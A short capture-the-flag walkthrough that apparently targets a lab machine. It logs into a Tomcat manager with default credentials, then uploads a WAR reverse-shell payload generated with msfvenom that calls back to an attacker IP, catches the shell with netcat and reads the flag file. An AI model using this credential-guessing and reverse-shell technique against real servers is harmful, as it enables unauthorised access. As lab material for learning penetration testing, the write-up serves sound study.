Nmap reveals that port number 8080 is open, let’s visit the port number 8080 in web browser.
To access Tomcat manger we need a valid Username and Password, When we enter any invalid Username and Password we will get a 403 Access Denied message.
Let’s try the Username : tomacat and password : s3cret
Once we successfully authenticate were brought to the Tomcat Web Application . The Tomcat manager has an option to upload .war files to the server.
We can use msfvenom to generate a java payload for reverse shell with .war extension
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war
Upload and Deploy the reverse shell then visit http://10.10.10.95:8080/cmd/
Let’s open a netcat Listener to get the shell which will be generated after our cmd.war file gets executed.
The Flag is located in
The user and root flags are written in 2 for the price of 1.txt file and it can be read using type command.
type "2 for the price of 1.txt"